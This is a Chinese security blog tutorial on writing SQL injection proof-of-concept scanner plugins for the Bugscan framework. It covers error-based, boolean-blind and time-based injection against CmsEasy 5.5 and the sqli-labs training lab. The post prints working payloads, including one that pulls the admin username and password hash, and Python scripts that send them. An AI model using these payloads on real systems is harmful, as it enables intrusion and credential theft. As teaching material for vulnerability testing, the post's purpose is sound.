<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="POC,编程," />





  <link rel="alternate" href="/atom.xml" title="Y-HKL's Blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />





<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>

<meta name="description" content="下面的文章写出了SQL注入的报错，布尔，时间注入的POC，通过这三个POC的编写来进入编写POC的入门。">
<meta name="keywords" content="POC,编程">
<meta property="og:type" content="article">
<meta property="og:title" content="基于报错布尔时间的SQL注入POC编写">
<meta property="og:url" content="http://y-hkl.top/2017/09/16/基于报错布尔时间的SQL注入POC编写/index.html">
<meta property="og:site_name" content="Y-HKL&#39;s Blog">
<meta property="og:description" content="下面的文章写出了SQL注入的报错，布尔，时间注入的POC，通过这三个POC的编写来进入编写POC的入门。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2017-09-17T03:32:36.400Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="基于报错布尔时间的SQL注入POC编写">
<meta name="twitter:description" content="下面的文章写出了SQL注入的报错，布尔，时间注入的POC，通过这三个POC的编写来进入编写POC的入门。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://y-hkl.top/2017/09/16/基于报错布尔时间的SQL注入POC编写/"/>





  <title> 基于报错布尔时间的SQL注入POC编写 | Y-HKL's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Y-HKL's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://y-hkl.top/2017/09/16/基于报错布尔时间的SQL注入POC编写/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Y-HKL">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/tt.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Y-HKL's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                基于报错布尔时间的SQL注入POC编写
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-09-16T23:14:11-04:00">
                2017-09-16
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/安全编程/" itemprop="url" rel="index">
                    <span itemprop="name">安全编程</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/09/16/基于报错布尔时间的SQL注入POC编写/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2017/09/16/基于报错布尔时间的SQL注入POC编写/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>下面的文章写出了SQL注入的报错，布尔，时间注入的POC，通过这三个POC的编写来进入编写POC的入门。<br><a id="more"></a></p>
<h2 id="基于报错的-SQL-注入-PoC-编写"><a href="#基于报错的-SQL-注入-PoC-编写" class="headerlink" title="基于报错的 SQL 注入 PoC 编写"></a>基于报错的 SQL 注入 PoC 编写</h2><p>选择的漏洞为CmsEasy最新版5.5_UTF-8_20140802多处SQL注入 ：<a href="http://wooyun.jozxing.cc/static/bugs/wooyun-2014-070827.html" target="_blank" rel="external">http://wooyun.jozxing.cc/static/bugs/wooyun-2014-070827.html</a></p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>漏洞分析在原文已经说的很详细了，大可以回原文查看。<br>我们在编写 PoC 的时候，如果原文中已经给出了具体的利用办法，我们就无需再关注整个漏洞的成因和原理，我们只用看这个漏洞的复现方式。<br>阅读原文后我们得到了 payload 和 目标 URL<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">请求的链接：</div><div class="line">http://xxx.com/celive/live/header.php</div><div class="line">POST 数据内容：</div><div class="line">xajax=LiveMessage&amp;xajaxargs[0][name]=1&apos;,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select concat(username,0x23,password) from cmseasy_user where groupid=2 limit 1))a from information_schema.tables group by a)b),&apos;&apos;,&apos;&apos;,&apos;&apos;,&apos;1&apos;,&apos;127.0.0.1&apos;,&apos;2&apos;)#</div></pre></td></tr></table></figure></p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>实验所需要 CMS 的下载地址: <a href="http://pan.baidu.com/s/1i4lAwBF" target="_blank" rel="external">http://pan.baidu.com/s/1i4lAwBF</a><br>安装完毕后，我们就可以进行手工复现利用过程了</p>
<h3 id="基于-Bugscan-框架编写POC"><a href="#基于-Bugscan-框架编写POC" class="headerlink" title="基于 Bugscan 框架编写POC"></a>基于 Bugscan 框架编写POC</h3><p>Bugscan 框架要求所有的逻辑代码都必须是基于 Python 2.7 的标准库的，所以像 requests 这种第三方库就不能在这里使用了<br>Bugscan配置环境：<a href="http://doc.bugscan.net/chapter1/1-1.html" target="_blank" rel="external">http://doc.bugscan.net/chapter1/1-1.html</a><br>代码编写<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># -*- coding: utf-8 -*-</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> urllib</div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">assign</span><span class="params">(service, arg)</span>:</span></div><div class="line">    <span class="keyword">if</span> service == <span class="string">"cmseasy"</span>:</div><div class="line">        <span class="keyword">return</span> <span class="keyword">True</span>, arg</div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">audit</span><span class="params">(arg)</span>:</span></div><div class="line">    target = arg + <span class="string">'/celive/live/header.php'</span></div><div class="line">    post_data = &#123;</div><div class="line">        <span class="string">'xajax'</span>: <span class="string">'LiveMessage'</span>,</div><div class="line">        <span class="string">'xajaxargs[0][name]'</span>: <span class="string">"1',(SELECT 1 FROM (select count(*),concat("</span></div><div class="line">                              <span class="string">"floor(rand(0)*2),(select md5(233)))a from "</span></div><div class="line">                              <span class="string">"information_schema.tables group by a)b),"</span></div><div class="line">                              <span class="string">"'','','','1','127.0.0.1','2') #"</span></div><div class="line">    &#125;</div><div class="line">    code, head, body, errcode, redirect_url = curl.curl2(</div><div class="line">        target, post=urllib.urlencode(post_data))</div><div class="line">    <span class="keyword">if</span> <span class="string">'e165421110ba03099a1c0393373c5b43'</span> <span class="keyword">in</span> body:</div><div class="line">        security_hole(target)</div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    <span class="keyword">from</span> dummy <span class="keyword">import</span> *</div><div class="line">    audit(assign(<span class="string">'cmseasy'</span>, <span class="string">'http://localhost/cmseasy/'</span>)[<span class="number">1</span>])</div></pre></td></tr></table></figure></p>
<h3 id="说明"><a href="#说明" class="headerlink" title="说明"></a>说明</h3><p>整体结构就像上面说的那样，最上面，是引入自己要用到的标准库，assign 就是任务分配函数，是来判断本次扫描任务是否可以调用这个 PoC 的， audit 就是整个验证逻辑的入口了，最下面的 if name == ‘main’: 这段代码是为了让你在本地测试用的。</p>
<h2 id="基于布尔的盲注的-SQL-注入-PoC-编写"><a href="#基于布尔的盲注的-SQL-注入-PoC-编写" class="headerlink" title="基于布尔的盲注的 SQL 注入 PoC 编写"></a>基于布尔的盲注的 SQL 注入 PoC 编写</h2><p>选择漏洞为Sqli labs Less-5</p>
<h3 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>目标URL <a href="http://127.0.0.1/sqli/Less-5/index.php?id=1" target="_blank" rel="external">http://127.0.0.1/sqli/Less-5/index.php?id=1</a><br>存在注入的参数是 id，由于sql 语句执行的选择后，选择的数据不能回显到前端页面，所以注入的类型是 Boolean-Based Blind</p>
<h3 id="漏洞复现-1"><a href="#漏洞复现-1" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>请求的SQL语句<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">SELECT * FROM users WHERE id=&apos;$id&apos; LIMIT 0,1</div></pre></td></tr></table></figure></p>
<p>构造语句<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">返回正确的语句 http://127.0.0.1/sqli/Less-5/index.php?id=1&apos; and 4343=4343%23</div><div class="line">返回不正确的语句  http://127.0.0.1/sqli/Less-5/index.php?id=1&apos; and 4343=4342%23</div></pre></td></tr></table></figure></p>
<p>对比两个 Payload, 发现唯一的差别就是 4343=4343 和 4343=4342 了,当然这里的这个数字嘛，随便写的<br>访问上面两个链接之后发现，第一个请求的响应页面中You are in………..，而第二个请求的响应页面中没有</p>
<h3 id="基于-Bugscan-框架的扫描插件编写"><a href="#基于-Bugscan-框架的扫描插件编写" class="headerlink" title="基于 Bugscan 框架的扫描插件编写"></a>基于 Bugscan 框架的扫描插件编写</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># -*- coding: utf-8 -*-</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> re</div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">assign</span><span class="params">(service, arg)</span>:</span></div><div class="line">    <span class="keyword">if</span> service == fingerprint.sqli:</div><div class="line">        <span class="keyword">return</span> <span class="keyword">True</span>, arg</div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">audit</span><span class="params">(arg)</span>:</span></div><div class="line">    <span class="comment"># 开发者可调用自定义函数</span></div><div class="line">    verify(arg)</div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">verify</span><span class="params">(url)</span>:</span></div><div class="line">    payloadtrue = <span class="string">"&#123;target&#125;/index.php?id=1%27%20and%201=1%23"</span>.format(target=url)</div><div class="line"></div><div class="line">    payloadfalse = <span class="string">"&#123;target&#125;/index.php?id=1%27%20and%201=2%23"</span>.format(target=url)</div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        code1, head1, body1, redirect_url1, log1 = hackhttp.http(payloadtrue)</div><div class="line">        </div><div class="line">        <span class="keyword">if</span> code1 != <span class="number">200</span> <span class="keyword">or</span> <span class="keyword">not</span>\</div><div class="line">                re.search(<span class="string">'You are in'</span>, body1, re.M):</div><div class="line">            <span class="keyword">return</span></div><div class="line"></div><div class="line">        code2, head2, body2, redirect_url2, log2 = hackhttp.http(payloadfalse)</div><div class="line">        <span class="keyword">if</span> code2 != <span class="number">200</span> <span class="keyword">or</span>\</div><div class="line">                re.search(<span class="string">'You are in'</span>, body2, re.M):</div><div class="line">            <span class="keyword">return</span></div><div class="line">        security_hole(<span class="string">"%s"</span> % (payloadtrue), log=log1)</div><div class="line">    <span class="keyword">except</span>:</div><div class="line">        <span class="keyword">pass</span></div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    <span class="keyword">from</span> dummy <span class="keyword">import</span> *</div><div class="line">    audit(assign(fingerprint.sqli, <span class="string">'http://127.0.0.1/sqli/Less-5'</span>)[<span class="number">1</span>])</div></pre></td></tr></table></figure>
<h2 id="基于时间的盲注的-SQL-注入-PoC-编写"><a href="#基于时间的盲注的-SQL-注入-PoC-编写" class="headerlink" title="基于时间的盲注的 SQL 注入 PoC 编写"></a>基于时间的盲注的 SQL 注入 PoC 编写</h2><p>选择的漏洞为Sqli labs Less-5<br>同一个漏洞有时间我们可以用不同的利用方式</p>
<h3 id="漏洞分析-2"><a href="#漏洞分析-2" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>构造语句<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">请求链接</div><div class="line">http://xxx.com/sqli/Less-5/index.php?id=1</div><div class="line">get数据内容</div><div class="line">1&apos; and (select if(1=1,sleep(5),1))--+</div></pre></td></tr></table></figure></p>
<p>核心的 SQL 语句是这样的， select if(1=1,sleep(5),1) 熟悉 MySQL 语法的人应该知道这个意思，第一个参数是表达式，就是说如果表达式为真的话，就执行第二个参数位置的语名，在本例子中是 sleep 5秒，如果为假就执行第三个参数位置的语句，本例子中就是返回一个字符 1</p>
<h3 id="漏洞复现-2"><a href="#漏洞复现-2" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">请求链接</div><div class="line">http://127.0.0.1/sqli/Less-5/index.php?id=1</div><div class="line">get数据内容</div><div class="line">1&apos; and (select if(1=1,sleep(5),1))--+</div><div class="line">1&apos; and (select if(1=2,sleep(5),1))--+</div></pre></td></tr></table></figure>
<p>我们打开 Firefox 浏览器，开启 hackbar, 再打开开发者工具，调到网络选项卡，可以看到不同的GET所花费的时间的不同</p>
<h3 id="基于-Bugscan-框架的扫描插件编写-1"><a href="#基于-Bugscan-框架的扫描插件编写-1" class="headerlink" title="基于 Bugscan 框架的扫描插件编写"></a>基于 Bugscan 框架的扫描插件编写</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># coding:utf-8</span></div><div class="line"><span class="keyword">import</span> urllib</div><div class="line"><span class="keyword">import</span> time</div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">assign</span><span class="params">(service, arg)</span>:</span></div><div class="line">    <span class="keyword">if</span> service == fingerprint.sqli5:</div><div class="line">        <span class="keyword">return</span> <span class="keyword">True</span>, arg</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">audit</span><span class="params">(arg)</span>:</span></div><div class="line">    target = <span class="string">"%s/celive/live/header.php"</span> % arg</div><div class="line"></div><div class="line">    get_data1 = <span class="string">"&#123;target&#125;/index.php?id=1%27%20and%20(select%20if(1=1,sleep(5),0))--+"</span>.format(target=arg)</div><div class="line">    <span class="comment">#print get_data1</span></div><div class="line">    get_data2 = <span class="string">"&#123;target&#125;/index.php?id=1%27%20and%20(select%20if(1=2,sleep(5),0))--+"</span>.format(target=arg)</div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        <span class="comment"># 记录开始请求的时间</span></div><div class="line">        start_time = time.time()</div><div class="line">        <span class="comment"># 发送 HTTP 请求</span></div><div class="line">        <span class="comment"># 这里需要注意的是 hackhttp 返回的第 4 个和第 5 个参数</span></div><div class="line">        code1, head1, html1, redirect1, log1 = hackhttp.http(get_data1)</div><div class="line">        <span class="comment"># 记录正常请求并收到响应的时间</span></div><div class="line">        end_time_1 = time.time()</div><div class="line">        code2, head2, html2, redirect2, log2 = hackhttp.http(get_data2)</div><div class="line">        <span class="comment"># 收到响应的时间</span></div><div class="line">        end_time_2 = time.time()</div><div class="line">        <span class="comment"># 计算时间差</span></div><div class="line">        delta1 = end_time_1 - start_time</div><div class="line">        delta2 = end_time_2 - end_time_1</div><div class="line">        <span class="comment">#print delta1</span></div><div class="line">        <span class="comment">#print delta2</span></div><div class="line">        <span class="keyword">if</span> (delta1 - delta2) &gt; <span class="number">4</span>:</div><div class="line">            <span class="comment"># 注意：warning 和 hole 级别必须传递 log</span></div><div class="line">            security_hole(<span class="string">"%s"</span> % (target), log=log1)</div><div class="line">    <span class="keyword">except</span> Exception,e:</div><div class="line">        <span class="keyword">print</span> e</div><div class="line">        <span class="keyword">pass</span></div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    <span class="keyword">from</span> dummy <span class="keyword">import</span> *</div><div class="line">    audit(assign(fingerprint.sqli5, <span class="string">'http://127.0.0.1/sqli/Less-5'</span>)[<span class="number">1</span>])</div></pre></td></tr></table></figure>
      
    </div>
	
	<div>
	  
		﻿<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
	  
	</div>
	
	<div>
      
        ﻿
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script type="text/javascript" src="http://jslibs.wuxubj.cn/sweetalert_mini/jquery-1.7.1.min.js"></script>
  <script src="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.min.js"></script>
  <link rel="stylesheet" type="text/css" href="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.mini.css">
  <p><span>本文标题:</span><a href="/2017/09/16/基于报错布尔时间的SQL注入POC编写/">基于报错布尔时间的SQL注入POC编写</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 Y-HKL 的个人博客">Y-HKL</a></p>
  <p><span>发布时间:</span>2017年09月16日 - 23:09</p>
  <p><span>最后更新:</span>2017年09月16日 - 23:09</p>
  <p><span>原始链接:</span><a href="/2017/09/16/基于报错布尔时间的SQL注入POC编写/" title="基于报错布尔时间的SQL注入POC编写">http://y-hkl.top/2017/09/16/基于报错布尔时间的SQL注入POC编写/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://y-hkl.top/2017/09/16/基于报错布尔时间的SQL注入POC编写/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    clipboard.on('success', $(function(){
      $(".fa-clipboard").click(function(){
        swal({   
          title: "",   
          text: '复制成功',   
          html: false,
          timer: 500,   
          showConfirmButton: false
        });
      });
    }));  
</script>

      
	</div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/POC/" rel="tag"><i class="fa fa-tag"></i> POC</a>
          
            <a href="/tags/编程/" rel="tag"><i class="fa fa-tag"></i> 编程</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/16/POC编写基础知识/" rel="next" title="POC编写基础知识">
                <i class="fa fa-chevron-left"></i> POC编写基础知识
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/10/09/通过shift快捷键运行后门/" rel="prev" title="通过shift快捷键运行后门">
                通过shift快捷键运行后门 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/tt.png"
               alt="Y-HKL" />
          <p class="site-author-name" itemprop="name">Y-HKL</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">15</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">16</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.zhihu.com/" target="_blank" title="知乎">
                  
                    <i class="fa fa-fw fa-envira"></i>
                  
                  知乎
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://htecne.top/" title="Htecne's Blog" target="_blank">Htecne's Blog</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://wyb0.com/" title="Reber's Blog" target="_blank">Reber's Blog</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.freebuf.com/" title="FreeBuf" target="_blank">FreeBuf</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.sec-wiki.com/" title="SecWiki" target="_blank">SecWiki</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.ichunqiu.com/" title="i春秋" target="_blank">i春秋</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.t00ls.net/" title="Tools安全" target="_blank">Tools安全</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
